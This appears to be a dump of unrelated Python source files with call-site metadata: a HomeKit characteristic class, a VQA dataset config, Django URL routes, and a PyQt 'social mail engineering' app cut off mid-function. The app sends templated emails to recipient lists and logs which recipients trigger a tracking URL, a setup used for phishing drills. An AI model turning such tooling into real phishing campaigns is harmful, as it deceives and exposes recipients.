'"""defaultskinignore"""', (139, 104, 139, 110): '"""true"""'}, {}), "('defaultskinignore', 'true')", False, 'from resources.lib.modules import control\n'), ((146, 12, 146, 30), 'resources.lib.modules.control.sleep', 'control.sleep', ({(146, 26, 146, 29): '(200)'}, {}), '(200)', False, 'from resources.lib.modules import control\n'), ((148, 12, 148, 44), 'resources.lib.modules.control.execute', 'control.execute', ({(148, 28, 148, 43): '"""SendClick(11)"""'}, {}), "('SendClick(11)')", False, 'from resources.lib.modules import control\n'), ((150, 14, 150, 71), 'resources.lib.modules.control.Notify', 'control.Notify', ({(150, 29, 150, 47): 'control.AddonTitle', (150, 48, 150, 70): '"""Skin Swap Timed Out!"""'}, {}), "(control.AddonTitle, 'Skin Swap Timed Out!')", False, 'from resources.lib.modules import control\n'), ((58, 16, 58, 64), 'resources.lib.modules.control.log', 'control.log', ({(58, 28, 58, 63): "('%s saved to %s' % (item, match[0]))"}, {}), "('%s saved to %s' % (item, match[0]))", False, 'from resources.lib.modules import control\n'), ((110, 18, 110, 52), 'resources.lib.modules.control.loga', 'control.loga', ({(110, 31, 110, 51): '"""Skin was not reset"""'}, {}), "('Skin was not reset')", False, 'from resources.lib.modules import control\n'), ((110, 54, 110, 101), 'resources.lib.modules.control.setSetting', 'control.setSetting', ({(110, 73, 110, 92): '"""defaultskinignore"""', (110, 94, 110, 100): '"""true"""'}, {}), "('defaultskinignore', 'true')", False, 'from resources.lib.modules import control\n'), ((124, 18, 124, 62), 'resources.lib.modules.control.loga', 'control.loga', ({(124, 31, 124, 61): "('ID not found for %s' % folder)"}, {}), "('ID not found for %s' % folder)", False, 'from resources.lib.modules import control\n'), ((144, 18, 144, 73), 'resources.lib.modules.control.condVisibility', 'control.condVisibility', ({(144, 41, 144, 72): '"""Window.isVisible(yesnodialog)"""'}, {}), "('Window.isVisible(yesnodialog)')", False, 'from resources.lib.modules import control\n'), ((84, 21, 84, 59), 're.compile', 're.compile', ({(84, 32, 84, 58): '"""<addon.+?ame="(.+?)".+?>"""'}, {}), '(\'<addon.+?ame="(.+?)".+?>\')', False, 'import os, re, shutil, time, xbmc\n'), ((123, 22, 123, 66), 'resources.lib.modules.control.loga', 'control.loga', ({(123, 35, 123, 65): "('ID not found for %s' % folder)"}, {}), "('ID not found for %s' % folder)", False, 'from resources.lib.modules import control\n'), ((133, 22, 133, 56), 'resources.lib.modules.control.loga', 'control.loga', ({(133, 35, 133, 55): '"""Skin was not reset"""'}, {}), "('Skin was not reset')", False, 'from resources.lib.modules import control\n'), ((133, 58, 133, 105), 'resources.lib.modules.control.setSetting', 'control.setSetting', ({(133, 77, 133, 96): '"""defaultskinignore"""', (133, 98, 133, 104): '"""true"""'}, {}), "('defaultskinignore', 'true')", False, 'from resources.lib.modules import control\n'), ((138, 22, 138, 56), 'resources.lib.modules.control.loga', 'control.loga', ({(138, 35, 138, 55): '"""Skin was not reset"""'}, {}), "('Skin was not reset')", False, 'from resources.lib.modules import control\n'), ((138, 58, 138, 105), 'resources.lib.modules.control.setSetting', 'control.setSetting', ({(138, 77, 138, 96): '"""defaultskinignore"""', (138, 98, 138, 104): '"""true"""'}, {}), "('defaultskinignore', 'true')", False, 'from resources.lib.modules import control\n'), ((56, 24, 56, 53), 're.compile', 're.compile', ({(56, 35, 56, 52): '"""{"value":(.+?)}"""'}, {}), '(\'{"value":(.+?)}\')', False, 'import os, re, shutil, time, xbmc\n'), ((119, 24, 119, 61), 're.compile', 're.compile', ({(119, 35, 119, 60): '"""<addon.+?id="(.+?)".+?>"""'}, {}), '(\'<addon.+?id="(.+?)".+?>\')', False, 'import os, re, shutil, time, xbmc\n'), ((120, 25, 120, 64), 're.compile', 're.compile', ({(120, 36, 120, 63): '"""<addon.+?name="(.+?)".+?>"""'}, {}), '(\'<addon.+?name="(.+?)".+?>\')', False, 'import os, re, shutil, time, xbmc\n'), ((129, 37, 129, 71), 'resources.lib.modules.control.loga', 'control.loga', ({(129, 50, 129, 70): '"""Skin was not reset"""'}, {}), "('Skin was not reset')", False, 'from resources.lib.modules import control\n'), ((129, 73, 129, 120), 'resources.lib.modules.control.setSetting', 'control.setSetting', ({(129, 92, 129, 111): '"""defaultskinignore"""', (129, 113, 129, 119): '"""true"""'}, {}), "('defaultskinignore', 'true')", False, 'from resources.lib.modules import control\n')]
bdraco/HAP-python
pyhap/characteristic.py
a2a5ce109d08af2f4f5bda4075f2176a98123806
""" All things for a HAP characteristic. A Characteristic is the smallest unit of the smart home, e.g. a temperature measuring or a device status. """ import logging from pyhap.const import ( HAP_PERMISSION_READ, HAP_REPR_DESC, HAP_REPR_FORMAT, HAP_REPR_IID, HAP_REPR_MAX_LEN, HAP_REPR_PERM, HAP_REPR_TYPE, HAP_REPR_VALID_VALUES, HAP_REPR_VALUE, ) from .util import hap_type_to_uuid, uuid_to_hap_type logger = logging.getLogger(__name__) # ### HAP Format ### HAP_FORMAT_BOOL = "bool" HAP_FORMAT_INT = "int" HAP_FORMAT_FLOAT = "float" HAP_FORMAT_STRING = "string" HAP_FORMAT_ARRAY = "array" HAP_FORMAT_DICTIONARY = "dictionary" HAP_FORMAT_UINT8 = "uint8" HAP_FORMAT_UINT16 = "uint16" HAP_FORMAT_UINT32 = "uint32" HAP_FORMAT_UINT64 = "uint64" HAP_FORMAT_DATA = "data" HAP_FORMAT_TLV8 = "tlv8" HAP_FORMAT_DEFAULTS = { HAP_FORMAT_BOOL: False, HAP_FORMAT_INT: 0, HAP_FORMAT_FLOAT: 0.0, HAP_FORMAT_STRING: "", HAP_FORMAT_ARRAY: "", HAP_FORMAT_DICTIONARY: "", HAP_FORMAT_UINT8: 0, HAP_FORMAT_UINT16: 0, HAP_FORMAT_UINT32: 0, HAP_FORMAT_UINT64: 0, HAP_FORMAT_DATA: "", HAP_FORMAT_TLV8: "", } HAP_FORMAT_NUMERICS = ( HAP_FORMAT_INT, HAP_FORMAT_FLOAT, HAP_FORMAT_UINT8, HAP_FORMAT_UINT16, HAP_FORMAT_UINT32, HAP_FORMAT_UINT64, ) # ### HAP Units ### HAP_UNIT_ARC_DEGREE = "arcdegrees" HAP_UNIT_CELSIUS = "celsius" HAP_UNIT_LUX = "lux" HAP_UNIT_PERCENTAGE = "percentage" HAP_UNIT_SECONDS = "seconds" # ### Properties ### PROP_FORMAT = "Format" PROP_MAX_VALUE = "maxValue" PROP_MIN_STEP = "minStep" PROP_MIN_VALUE = "minValue" PROP_PERMISSIONS = "Permissions" PROP_UNIT = "unit" PROP_VALID_VALUES = "ValidValues" PROP_NUMERIC = (PROP_MAX_VALUE, PROP_MIN_VALUE, PROP_MIN_STEP, PROP_UNIT) class CharacteristicError(Exception): """Generic exception class for characteristic errors.""" class Characteristic: """Represents a HAP characteristic, the smallest unit of the smart home. A HAP characteristic is some measurement or state, like battery status or the current temperature. Characteristics are contained in services. Each characteristic has a unique type UUID and a set of properties, like format, min and max values, valid values and others. """ __slots__ = ( "broker", "display_name", "properties", "type_id", "value", "getter_callback", "setter_callback", "service", "_uuid_str", "_loader_display_name", ) def __init__(self, display_name, type_id, properties): """Initialise with the given properties. :param display_name: Name that will be displayed for this characteristic, i.e. the `description` in the HAP representation. :type display_name: str :param type_id: UUID unique to this type of characteristic. :type type_id: uuid.UUID :param properties: A dict of properties, such as Format, ValidValues, etc. :type properties: dict """ self.broker = None self.display_name = display_name self.properties = properties self.type_id = type_id self.value = self._get_default_value() self.getter_callback = None self.setter_callback = None self.service = None self._uuid_str = uuid_to_hap_type(type_id) self._loader_display_name = None def __repr__(self): """Return the representation of the characteristic.""" return "<characteristic display_name={} value={} properties={}>".format( self.display_name, self.value, self.properties ) def _get_default_value(self): """Return default value for format.""" if self.properties.get(PROP_VALID_VALUES): return min(self.properties[PROP_VALID_VALUES].values()) value = HAP_FORMAT_DEFAULTS[self.properties[PROP_FORMAT]] return self.to_valid_value(value) def get_value(self): """This is to allow for calling `getter_callback` :return: Current Characteristic Value """ if self.getter_callback: # pylint: disable=not-callable self.value = self.to_valid_value(value=self.getter_callback()) return self.value def to_valid_value(self, value): """Perform validation and conversion to valid value.""" if self.properties.get(PROP_VALID_VALUES): if value not in self.properties[PROP_VALID_VALUES].values(): error_msg = "{}: value={} is an invalid value.".format( self.display_name, value ) logger.error(error_msg) raise ValueError(error_msg) elif self.properties[PROP_FORMAT] == HAP_FORMAT_STRING: value = str(value)[:256] elif self.properties[PROP_FORMAT] == HAP_FORMAT_BOOL: value = bool(value) elif self.properties[PROP_FORMAT] in HAP_FORMAT_NUMERICS: if not isinstance(value, (int, float)): error_msg = "{}: value={} is not a numeric value.".format( self.display_name, value ) logger.error(error_msg) raise ValueError(error_msg) value = min(self.properties.get(PROP_MAX_VALUE, value), value) value = max(self.properties.get(PROP_MIN_VALUE, value), value) return value def override_properties(self, properties=None, valid_values=None): """Override characteristic property values and valid values. :param properties: Dictionary with values to override the existing properties. Only changed values are required. :type properties: dict :param valid_values: Dictionary with values to override the existing valid_values. Valid values will be set to new dictionary. :type valid_values: dict """ if not properties and not valid_values: raise ValueError("No properties or valid_values specified to override.") if properties: self.properties.update(properties) if valid_values: self.properties[PROP_VALID_VALUES] = valid_values try: self.value = self.to_valid_value(self.value) except ValueError: self.value = self._get_default_value() def set_value(self, value, should_notify=True): """Set the given raw value. It is checked if it is a valid value. If not set_value will be aborted and an error message will be displayed. `Characteristic.setter_callback` You may also define a `setter_callback` on the `Characteristic`. This will be called with the value being set as the arg. .. seealso:: Characteristic.value :param value: The value to assign as this Characteristic's value. :type value: Depends on properties["Format"] :param should_notify: Whether a the change should be sent to subscribed clients. Notify will be performed if the broker is set. :type should_notify: bool """ logger.debug("set_value: %s to %s", self.display_name, value) value = self.to_valid_value(value) self.value = value if should_notify and self.broker: self.notify() def client_update_value(self, value, sender_client_addr=None): """Called from broker for value change in Home app. Change self.value to value and call callback. """ logger.debug( "client_update_value: %s to %s from client: %s", self.display_name, value, sender_client_addr, ) self.value = value self.notify(sender_client_addr) if self.setter_callback: # pylint: disable=not-callable self.setter_callback(value) def notify(self, sender_client_addr=None): """Notify clients about a value change. Sends the value. .. seealso:: accessory.publish .. seealso:: accessory_driver.publish """ self.broker.publish(self.value, self, sender_client_addr) # pylint: disable=invalid-name def to_HAP(self): """Create a HAP representation of this Characteristic. Used for json serialization. :return: A HAP representation. :rtype: dict """ hap_rep = { HAP_REPR_IID: self.broker.iid_manager.get_iid(self), HAP_REPR_TYPE: self._uuid_str, HAP_REPR_PERM: self.properties[PROP_PERMISSIONS], HAP_REPR_FORMAT: self.properties[PROP_FORMAT], } # HAP_REPR_DESC (description) is optional and takes up # quite a bit of space in the payload. Only include it # if it has been changed from the default loader version if ( not self._loader_display_name or self._loader_display_name != self.display_name ): hap_rep[HAP_REPR_DESC] = self.display_name value = self.get_value() if self.properties[PROP_FORMAT] in HAP_FORMAT_NUMERICS: hap_rep.update( {k: self.properties[k] for k in self.properties.keys() & PROP_NUMERIC} ) if PROP_VALID_VALUES in self.properties: hap_rep[HAP_REPR_VALID_VALUES] = sorted( self.properties[PROP_VALID_VALUES].values() ) elif self.properties[PROP_FORMAT] == HAP_FORMAT_STRING: if len(value) > 64: hap_rep[HAP_REPR_MAX_LEN] = min(len(value), 256) if HAP_PERMISSION_READ in self.properties[PROP_PERMISSIONS]: hap_rep[HAP_REPR_VALUE] = value return hap_rep @classmethod def from_dict(cls, name, json_dict, from_loader=False): """Initialize a characteristic object from a dict. :param json_dict: Dictionary containing at least the keys `Format`, `Permissions` and `UUID` :type json_dict: dict """ type_id = hap_type_to_uuid(json_dict.pop("UUID")) char = cls(name, type_id, properties=json_dict) if from_loader: char._loader_display_name = ( # pylint: disable=protected-access char.display_name ) return char
[((23, 9, 23, 36), 'logging.getLogger', 'logging.getLogger', ({(23, 27, 23, 35): '__name__'}, {}), '(__name__)', False, 'import logging\n')]
linxi1158/iMIX
configs/_base_/datasets/uniter/vqa_dataset_uniter.py
af87a17275f02c94932bb2e29f132a84db812002
dataset_type = 'UNITER_VqaDataset' data_root = '/home/datasets/mix_data/UNITER/VQA/' train_datasets = ['train'] test_datasets = ['minival'] # name not in use, but have defined one to run vqa_cfg = dict( train_txt_dbs=[ data_root + 'vqa_train.db', data_root + 'vqa_trainval.db', data_root + 'vqa_vg.db', ], train_img_dbs=[ data_root + 'coco_train2014/', data_root + 'coco_val2014', data_root + 'vg/', ], val_txt_db=data_root + 'vqa_devval.db', val_img_db=data_root + 'coco_val2014/', ans2label_file=data_root + 'ans2label.json', max_txt_len=60, conf_th=0.2, max_bb=100, min_bb=10, num_bb=36, train_batch_size=20480, # 5120, val_batch_size=40960, # 10240, ) BUCKET_SIZE = 8192 train_data = dict( samples_per_gpu=vqa_cfg['train_batch_size'], workers_per_gpu=4, pin_memory=True, batch_sampler=dict( type='TokenBucketSampler', bucket_size=BUCKET_SIZE, batch_size=vqa_cfg['train_batch_size'], drop_last=True, size_multiple=8, ), data=dict( type=dataset_type, datacfg=vqa_cfg, train_or_val=True, ), ) test_data = dict( samples_per_gpu=vqa_cfg['val_batch_size'], workers_per_gpu=4, batch_sampler=dict( type='TokenBucketSampler', bucket_size=BUCKET_SIZE, batch_size=vqa_cfg['val_batch_size'], drop_last=False, size_multiple=8, ), pin_memory=True, data=dict( type=dataset_type, datacfg=vqa_cfg, train_or_val=False, ), ) post_processor = dict( type='Evaluator', metrics=[dict(type='UNITER_AccuracyMetric')], dataset_converters=[dict(type='UNITER_DatasetConverter')], )
[]
TonikX/ITMO_ICT_-WebProgramming_2020
students/k3340/laboratory_works/laboratory_works/Arlakov_Denis/laboratiry_work_2_and_3/lab/django-react-ecommerce-master/home/urls.py
ba566c1b3ab04585665c69860b713741906935a0
from django.conf import settings from django.conf.urls.static import static from django.contrib import admin from django.urls import path, include, re_path from django.views.generic import TemplateView urlpatterns = [ path('api-auth/', include('rest_framework.urls')), path('rest-auth/', include('rest_auth.urls')), path('rest-auth/registration/', include('rest_auth.registration.urls')), path('admin/', admin.site.urls), path('api/', include('core.api.urls')), ] if settings.DEBUG: urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT) if not settings.DEBUG: urlpatterns += [re_path(r'^.*', TemplateView.as_view(template_name='index.html'))]
[((11, 4, 11, 35), 'django.urls.path', 'path', ({(11, 9, 11, 17): '"""admin/"""', (11, 19, 11, 34): 'admin.site.urls'}, {}), "('admin/', admin.site.urls)", False, 'from django.urls import path, include, re_path\n'), ((16, 19, 17, 60), 'django.conf.urls.static.static', 'static', (), '', False, 'from django.conf.urls.static import static\n'), ((8, 22, 8, 52), 'django.urls.include', 'include', ({(8, 30, 8, 51): '"""rest_framework.urls"""'}, {}), "('rest_framework.urls')", False, 'from django.urls import path, include, re_path\n'), ((9, 23, 9, 48), 'django.urls.include', 'include', ({(9, 31, 9, 47): '"""rest_auth.urls"""'}, {}), "('rest_auth.urls')", False, 'from django.urls import path, include, re_path\n'), ((10, 36, 10, 74), 'django.urls.include', 'include', ({(10, 44, 10, 73): '"""rest_auth.registration.urls"""'}, {}), "('rest_auth.registration.urls')", False, 'from django.urls import path, include, re_path\n'), ((12, 17, 12, 41), 'django.urls.include', 'include', ({(12, 25, 12, 40): '"""core.api.urls"""'}, {}), "('core.api.urls')", False, 'from django.urls import path, include, re_path\n'), ((22, 28, 22, 76), 'django.views.generic.TemplateView.as_view', 'TemplateView.as_view', (), '', False, 'from django.views.generic import TemplateView\n')]
karta1782310/python-docx-automated-report-generation
20200416_Socialmail/mailserverUi.py
f0e02a50a9e9547d131e583be0711aad72f08b51
#!/bin/bash # -*- coding: UTF-8 -*- # 基本控件都在这里面 from PyQt5.QtWebEngineWidgets import QWebEngineView from PyQt5.QtWidgets import (QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView) from PyQt5.QtGui import QPalette, QColor, QBrush from PyQt5.QtCore import Qt, QDateTime from pyqtgraph import GraphicsLayoutWidget, setConfigOption, setConfigOptions import qdarkstyle, sys import mylibrary.genmail as gm from GenAndSendMail import insert_send_mail from server.database import Database from server.sendmail import Smtp from server.client import Client from email import generator from pandas import DataFrame from copy import deepcopy class SubWindow(QWidget): def __init__(self): super().__init__() self.resize(400,100) self.main_layout = QGridLayout() self.setLayout(self.main_layout) self.setStyleSheet(qdarkstyle.load_stylesheet_pyqt5()) self.main_layout.addWidget(QLabel('收件人'), 0, 0, 1, 1) self.in_recipient = QLineEdit() self.main_layout.addWidget(self.in_recipient, 0, 1, 1, 5) self.btn_send = QPushButton('寄送') self.main_layout.addWidget(self.btn_send, 1, 5, 1, 1) class MailserverUi(QMainWindow): def __init__(self): super().__init__() setConfigOption('background', '#19232D') setConfigOption('foreground', 'd') setConfigOptions(antialias = True) # self.resize(720,500) self.init_ui() self.data_smtp = [] self.data_db = [] self.data_logs = [] self.data_temp_logs = [] # self.sub_win = SubWindow() # 默認狀態欄 self.status = self.statusBar() self.status.showMessage("開發者: 鄭鈺城, 聯絡資訊: [email protected]") # 標題欄 self.setWindowTitle("社交郵件工程") self.setWindowOpacity(1) # 窗口透明度 self.main_layout.setSpacing(0) self.setStyleSheet(qdarkstyle.load_stylesheet_pyqt5()) self.main_widget.setStyleSheet( """ QComboBox::item:checked { height: 12px; border: 1px solid #32414B; margin-top: 0px; margin-bottom: 0px; padding: 4px; padding-left: 0px; } """ ) def init_ui(self): # 創建視窗主部件 self.main_widget = QWidget() # 創建主部件的網格佈局 self.main_layout = QGridLayout() # 設置窗口主部件佈局為網格佈局 self.main_widget.setLayout(self.main_layout) # 創建左側部件 self.left_widget = QWidget() self.left_widget.setObjectName('left_widget') self.left_layout = QGridLayout() self.left_widget.setLayout(self.left_layout) # 創建右側部件 self.right_widget = QWidget() self.right_widget.setObjectName('right_widget') self.right_layout = QGridLayout() self.right_widget.setLayout(self.right_layout) # 左側部件在第0行第0列,佔12行3列 self.main_layout.addWidget(self.left_widget, 0, 0, 12, 3) # 右側部件在第0行第3列,佔12行8列 self.main_layout.addWidget(self.right_widget, 0, 3, 12, 8) # 設置視窗主部件 self.setCentralWidget(self.main_widget) # 主要功能按鈕 self.btn_sendmail = QPushButton("發送信件") self.btn_sendmail.clicked.connect(self.display_send_mail) self.btn_smtp = QPushButton("系統設定") self.btn_smtp.clicked.connect(self.display_smtp_setting) self.btn_db = QPushButton("資料庫設定") self.btn_db.clicked.connect(self.display_db_setting) self.btn_update_eml = QPushButton("修改樣板") self.btn_update_eml.clicked.connect(self.display_update_eml) self.btn_get_logs = QPushButton("觸發明細") self.btn_get_logs.clicked.connect(self.display_logs) self.btn_download_logs = QPushButton("下載觸發明細") self.btn_download_logs.clicked.connect(self.logs_download) self.quit_btn = QPushButton("退出") self.quit_btn.clicked.connect(self.quit_act) self.left_layout.addWidget(self.btn_sendmail, 2, 0, 1, 3) self.left_layout.addWidget(self.btn_smtp, 3, 0, 1, 3) self.left_layout.addWidget(self.btn_db, 4, 0, 1, 3) self.left_layout.addWidget(self.btn_update_eml, 5, 0, 1, 3) self.left_layout.addWidget(self.btn_get_logs, 6, 0, 1, 3) self.left_layout.addWidget(self.btn_download_logs, 7, 0, 1, 3) self.left_layout.addWidget(self.quit_btn, 8, 0, 1, 3) # 主要功能查詢 self.in_data = QLineEdit() self.in_data.setPlaceholderText("暫無") self.left_layout.addWidget(self.in_data, 1, 0, 1, 3) # 主要功能 log self.query_result = QTableWidget() self.left_layout.addWidget(self.query_result, 9, 0, 2, 3) self.query_result.verticalHeader().setVisible(False) self.right_display = GraphicsLayoutWidget() self.right_layout.addWidget(self.right_display, 0, 3, 12, 8) # 右側物件: sendmail self.in_eml_type = QLineEdit() self.in_eml_template = QLineEdit() self.btn_eml_browse = QPushButton('瀏覽') self.btn_eml_browse.clicked.connect(lambda: self.open_eml(self.in_eml_template)) self.in_recipient_group = QLineEdit() self.in_recipient_excel = QLineEdit() self.btn_recipient_browse = QPushButton('瀏覽') self.btn_recipient_browse.clicked.connect(lambda: self.open_excel(self.in_recipient_excel)) self.in_annex_file = QLineEdit() self.btn_annex_file = QPushButton('瀏覽') self.btn_annex_file.clicked.connect(lambda: self.open_word(self.in_annex_file)) self.in_scheduler = QDateTimeEdit(QDateTime.currentDateTime()) self.in_scheduler.setCalendarPopup(True) self.in_scheduler.setDisplayFormat('yyyy-MM-dd hh:mm') self.cb_scheduler = QCheckBox('使用') self.btn_sendmail_start = QPushButton('執行') self.btn_sendmail_start.clicked.connect(self.send_mail) # 右側物件: smtp self.in_smtp_host = QLineEdit() self.in_smtp_port = QLineEdit() self.in_smtp_user = QLineEdit() self.in_smtp_password = QLineEdit() self.cb_smtp_ssl = QCheckBox('使用') self.in_smtp_test = QLineEdit() self.btn_smtp_save = QPushButton('儲存') self.btn_smtp_save.clicked.connect(lambda: self.save_data(self.data_smtp)) self.btn_smtp_test = QPushButton('測試') self.btn_smtp_test.clicked.connect(self.show_sub_win) # 右側物件: db self.in_db_host = QLineEdit() self.in_db_port = QLineEdit() self.in_db_user = QLineEdit() self.in_db_password = QLineEdit() self.in_db_database = QLineEdit() self.in_db_domain = QLineEdit() self.in_db_domain.setPlaceholderText('回收風險資訊動作的網址') self.btn_db_save = QPushButton('儲存') self.btn_db_save.clicked.connect(lambda: self.save_data(self.data_db)) # 右側物件: update eml self.in_edit_sender = QLineEdit() self.in_edit_sender_name = QLineEdit() self.cb_edit_annex = QCheckBox('是') self.in_edit_annex = QLineEdit() self.btn_edit_annex = QPushButton('瀏覽') self.btn_edit_annex.clicked.connect(lambda: self.open_annex(self.in_edit_annex)) self.in_edit_subject = QLineEdit() self.mail_tab = QTabWidget() self.mail_tab.setDocumentMode(True) self.mail_tab.currentChanged.connect(self.print_html) self.mail_tab_1 = QWidget() self.mail_tab_2 = QWidget() self.mail_tab.addTab(self.mail_tab_1, 'Html') self.mail_tab.addTab(self.mail_tab_2, 'Web') self.tab_1 = QGridLayout() self.tab_2 = QGridLayout() self.tab_1.setContentsMargins(0,0,0,0) self.tab_2.setContentsMargins(0,0,0,0) self.mail_tab_1.setLayout(self.tab_1) self.mail_tab_2.setLayout(self.tab_2) self.in_edit_html = QTextEdit() self.in_edit_web = QWebEngineView() self.tab_1.addWidget(self.in_edit_html, 1, 1, 1, 1) self.tab_2.addWidget(self.in_edit_web, 1, 1, 1, 1) self.btn_edit_eml_reset = QPushButton('清除') self.btn_edit_eml_reset.clicked.connect(self.eml_reset) self.btn_edit_eml_read = QPushButton('讀取') self.btn_edit_eml_read.clicked.connect(self.eml_open) self.btn_edit_eml_save = QPushButton('儲存') self.btn_edit_eml_save.clicked.connect(self.eml_save) # 右側物件: logs self.tbw_logs = QTableWidget() self.tbw_logs.verticalHeader().setVisible(False) self.cmb_logs_choice = QComboBox() self.in_logs_data = QLineEdit() self.in_logs_data.setPlaceholderText("輸入資料") self.btn_logs_search = QPushButton('執行') self.btn_logs_search.clicked.connect(self.logs_change) def display_send_mail(self): self.clear_layout(self.right_layout) labels = [ "信件類型 :", "信件模板 :", " 收件人群組 :", "收件人資料 :", '附件資料 :',"設定排程 :"] for i, label in enumerate(labels): self.right_layout.addWidget(QLabel(label), i, 3, 1, 1, Qt.AlignRight) self.right_layout.addWidget(self.in_eml_type, 0, 4, 1, 7) self.right_layout.addWidget(self.in_eml_template, 1, 4, 1, 6) self.right_layout.addWidget(self.btn_eml_browse, 1, 10, 1, 1) self.right_layout.addWidget(self.in_recipient_group, 2, 4, 1, 7) self.right_layout.addWidget(self.in_recipient_excel, 3, 4, 1, 6) self.right_layout.addWidget(self.btn_recipient_browse, 3, 10, 1, 1) self.right_layout.addWidget(self.in_annex_file , 4, 4, 1, 6) self.right_layout.addWidget(self.btn_annex_file, 4, 10, 1, 1) self.right_layout.addWidget(self.in_scheduler, 5, 4, 1, 6) self.right_layout.addWidget(self.cb_scheduler, 5, 10, 1, 1) self.right_layout.addWidget(self.btn_sendmail_start, 6, 9, 1, 2) def display_smtp_setting(self): self.clear_layout(self.right_layout) # 在右邊新增物件 labels = ["SMTP HOST :", "SMTP PORT :", "SMTP 帳號 :", "SMTP 密碼 :", "SMTP SSL :", " 測試信件內容 :"] for i, label in enumerate(labels): self.right_layout.addWidget(QLabel(label), i, 3, 1, 1, Qt.AlignRight) self.right_layout.addWidget(self.in_smtp_host, 0, 4, 1, 7) self.right_layout.addWidget(self.in_smtp_port, 1, 4, 1, 7) self.right_layout.addWidget(self.in_smtp_user, 2, 4, 1, 7) self.right_layout.addWidget(self.in_smtp_password, 3, 4, 1, 7) self.right_layout.addWidget(self.cb_smtp_ssl, 4, 4, 1, 7) self.right_layout.addWidget(self.in_smtp_test, 5, 4, 1, 7) self.right_layout.addWidget(self.btn_smtp_save, 6, 9, 1, 2) self.right_layout.addWidget(self.btn_smtp_test, 6, 7, 1, 2) def display_db_setting(self): self.clear_layout(self.right_layout) # 在右邊新增物件 labels = ["資料庫 HOST :", "資料庫 PORT :", "資料庫 帳號 :", "資料庫 密碼 :", "使用資料庫名稱 :", "回收網址 :"] for i, label in enumerate(labels): self.right_layout.addWidget(QLabel(label), i, 3, 1, 1, Qt.AlignRight) self.right_layout.addWidget(self.in_db_host, 0, 4, 1, 7) self.right_layout.addWidget(self.in_db_port, 1, 4, 1, 7) self.right_layout.addWidget(self.in_db_user, 2, 4, 1, 7) self.right_layout.addWidget(self.in_db_password, 3, 4, 1, 7) self.right_layout.addWidget(self.in_db_database, 4, 4, 1, 7) self.right_layout.addWidget(self.in_db_domain, 5, 4, 1, 7) self.right_layout.addWidget(self.btn_db_save, 6, 9, 1, 2) def display_update_eml(self): self.clear_layout(self.right_layout) labels = ["寄件人 :", "寄件人名稱 :", " 是否加入附件 :", "附件名稱 :", "主旨 :", "內容 :"] for i, label in enumerate(labels): self.label = QLabel(label) self.right_layout.addWidget(self.label, i, 3, 1, 1, Qt.AlignRight) self.right_layout.addWidget(self.in_edit_sender, 0, 4, 1, 7) self.right_layout.addWidget(self.in_edit_sender_name, 1, 4, 1, 7) self.right_layout.addWidget(self.cb_edit_annex, 2, 4, 1, 7) self.right_layout.addWidget(self.in_edit_annex, 3, 4, 1, 6) self.right_layout.addWidget(self.btn_edit_annex, 3, 10, 1, 1) self.right_layout.addWidget(self.in_edit_subject, 4, 4, 1, 7) self.right_layout.addWidget(self.mail_tab, 5, 4, 6, 7) self.right_layout.addWidget(self.btn_edit_eml_reset, 11, 5, 1, 2) self.right_layout.addWidget(self.btn_edit_eml_read, 11, 7, 1, 2) self.right_layout.addWidget(self.btn_edit_eml_save, 11, 9, 1, 2) def display_logs(self): self.data_temp_logs = [] self.tbw_logs.setRowCount(0) self.clear_layout(self.right_layout) self.right_layout.addWidget(self.tbw_logs, 1, 3, 11, 8) self.right_layout.addWidget(QLabel('查詢 :'), 0, 3, 1, 1) self.right_layout.addWidget(self.cmb_logs_choice, 0, 4, 1, 2) self.right_layout.addWidget(self.in_logs_data, 0, 6, 1, 3) self.right_layout.addWidget(self.btn_logs_search, 0, 9, 1, 2) try: db = Database(self.data_db[0], int(self.data_db[1]), self.data_db[2], self.data_db[3], self.data_db[4]) if self.data_db[:5] else Database() self.data_logs = db.get_logs() self.data_temp_logs = deepcopy(self.data_logs) if self.data_logs: row_num = len(self.data_logs) col_num = len(self.data_logs[0]) col_lst = list(self.data_logs[0].keys()) self.cmb_logs_choice.clear() self.cmb_logs_choice.addItems(col_lst) self.tbw_logs.setRowCount(row_num) self.tbw_logs.setColumnCount(col_num) self.tbw_logs.horizontalHeader().setSectionResizeMode(QHeaderView.ResizeToContents) self.tbw_logs.setHorizontalHeaderLabels(col_lst) for i in range(row_num): row_data = list(self.data_logs[i].values()) for j in range(col_num): temp_data = row_data[j] item = QTableWidgetItem(str(temp_data)) item.setForeground(QBrush(QColor(144, 182, 240))) self.tbw_logs.setItem(i, j, item) except: QMessageBox.warning(self, 'Failed!', '資料庫連結失敗!', QMessageBox.Ok) else: db.__disconnect__() def get_items_from_layout(self, layout): return [layout.itemAt(i).widget() for i in range(layout.count())] def save_data(self, data): items = self.get_items_from_layout(self.right_layout) data.clear() try: for item in items: if type(item) == type(QLineEdit()): data.append(item.text()) elif type(item) == type(QCheckBox()): data.append(item.isChecked()) QMessageBox.information(self, 'Success!', '儲存成功!', QMessageBox.Ok) except: QMessageBox.warning(self, 'Failed!', '儲存失敗!', QMessageBox.Ok) print(data) def clear_layout(self, layout): for i in reversed(range(layout.count())): layout.itemAt(i).widget().setParent(None) def open_eml(self, obj): file_name, _ = QFileDialog.getOpenFileName(self, "選取檔案", "./", "Eml Files (*.eml)") obj.setText(file_name) def open_excel(self, obj): file_name, _ = QFileDialog.getOpenFileName(self, "選取檔案", "./", "Excel Files (*.xlsx)") obj.setText(file_name) def open_word(self, obj): file_name, _ = QFileDialog.getOpenFileName(self, "選取檔案", "./", "Word Files (*.doc *.docx)") obj.setText(file_name) def open_annex(self, obj): file_name, _ = QFileDialog.getOpenFileName(self, "選取檔案", "./", "Annex Files (*.jpg *.png *.zip)") org_files = obj.text() all_files = org_files + ',' + file_name if org_files else file_name obj.setText(all_files) def print_html(self, index): if index: self.in_edit_web.setHtml(self.in_edit_html.toPlainText()) def send_mail(self): eml_type = self.in_eml_type.text() eml_file = self.in_eml_template.text() user_group = self.in_recipient_group.text() mail_excel = self.in_recipient_excel.text() annex_file = self.in_annex_file.text() url = self.data_db[5] if self.data_db else 'http://yumail.myvnc.com' try: if self.cb_scheduler.isChecked(): my_time = self.in_scheduler.text()+':00' client = Client() client.send(self.data_smtp[:4], self.data_db[:5], eml_type, eml_file, user_group, mail_excel, annex_file, url, my_time) QMessageBox.information(self, 'Success!', '排程設定成功!', 